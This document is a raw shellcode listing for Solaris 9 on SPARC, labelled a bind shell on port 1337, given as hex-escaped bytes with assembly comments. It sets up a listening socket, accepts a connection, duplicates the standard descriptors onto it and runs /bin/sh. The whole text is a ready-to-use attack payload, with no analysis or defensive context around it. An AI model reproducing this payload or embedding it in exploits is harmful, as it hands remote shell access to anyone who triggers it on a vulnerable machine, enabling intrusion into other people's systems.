
// bind shell on port 1337, tested on Solaris 9 (Sunos 5.9) SPARC

    "\x82\x10\x20\x06" //       mov          0x6, %g1
    "\x90\x10\x20\x03" //       mov          0x3, %o0
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x90\x10\x20\x04" //       mov          0x4, %o0
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x82\x10\x20\xe6" //       mov          0xe6, %g1
    "\x90\x10\x20\x02" //       mov          0x2, %o0
    "\x92\x10\x20\x02" //       mov          0x2, %o1
    "\x94\x10\x20\x06" //       mov          0x6, %o2
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x82\x10\x20\xe8" //       mov          0xe8, %g1
    "\xa0\x10\x20\x02" //       mov          0x2, %l0
    "\xe0\x33\xbf\xec" //       sth          %l0, [%sp - 0x14]
    "\xa0\x10\x25\x39" //       mov          0x539, %l0
    "\xe0\x33\xbf\xee" //       sth          %l0, [%sp - 0x12]
    "\xc0\x23\xbf\xf0" //       clr          [%sp - 0x10]
    "\xc0\x23\xbf\xf4" //       clr          [%sp - 0xc]
    "\xc0\x23\xbf\xf8" //       clr          [%sp - 0x8]
    "\x92\x23\xa0\x14" //       sub          %sp, 0x14, %o1
    "\x94\x10\x20\x10" //       mov          0x10, %o2
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x82\x10\x20\xe9" //       mov          0xe9, %g1
    "\x90\x10\x20\x03" //       mov          0x3, %o0
    "\x92\x10\x00\x00" //       clr          %o1
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x92\x1a\x40\x09" //       xor          %o1, %o1, %o1
    "\x90\x10\x20\xea" //       mov          0xea, %o0
    "\x92\x10\x20\x03" //       mov          0x3, %o1
    "\xc0\x23\xbf\xf8" //       clr          [%sp - 0x8]
    "\x96\x23\xa0\x08" //       sub          %sp, 0x8, %o3
    "\x94\x23\xa0\x08" //       sub          %sp, 0x8, %o2
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x82\x10\x20\x06" //       mov          0x6, %g1
    "\x90\x18\x40\x01" //       xor          %g1, %g1, %o0
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x90\x10\x20\x01" //       mov          0x1, %o0
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x90\x10\x20\x02" //       mov          0x2, %o0
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x82\x10\x20\x29" //       mov          0x29, %g1
    "\x90\x10\x20\x04" //       mov          0x4, %o0
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x90\x10\x20\x04" //       mov          0x4, %o0
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x90\x10\x20\x04" //       mov          0x4, %o0
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x21\x0b\xcb\xd8" //       sethi        %hi(0x2f2f6000), %l0
    "\xa0\x14\x22\x69" //       or           %l0, 0x269, %l0 ! 0x2f2f6269
    "\x23\x1b\x8b\xdc" //       sethi        %hi(0x6e2f7000), %l1
    "\xa2\x14\x63\x68" //       or           %l1, 0x368, %l1 ! 0x6e2f7368
    "\xe0\x3b\xbf\xe8" //       std          %l0, [%sp - 0x18]
    "\xc0\x23\xbf\xf0" //       clr          [%sp - 0x10]
    "\x90\x23\xa0\x18" //       sub          %sp, 0x18, %o0
    "\xd2\x23\xbf\xf4" //       st           %o1, [%sp - 0xc]
    "\xc0\x23\xbf\xf8" //       clr          [%sp - 0x8]
    "\x92\x23\xa0\x0c" //       sub          %sp, 0xc, %o1
    "\x94\x1a\x40\x09" //       xor          %o1, %o1, %o2
    "\x82\x10\x20\x3b" //       mov          0x3b, %g1
    "\x91\xd0\x20\x08" //       ta           0x8
    "\x82\x10\x20\x01" //       mov          0x1, %g1
    "\x91\xd0\x20\x08" //       ta           0x8
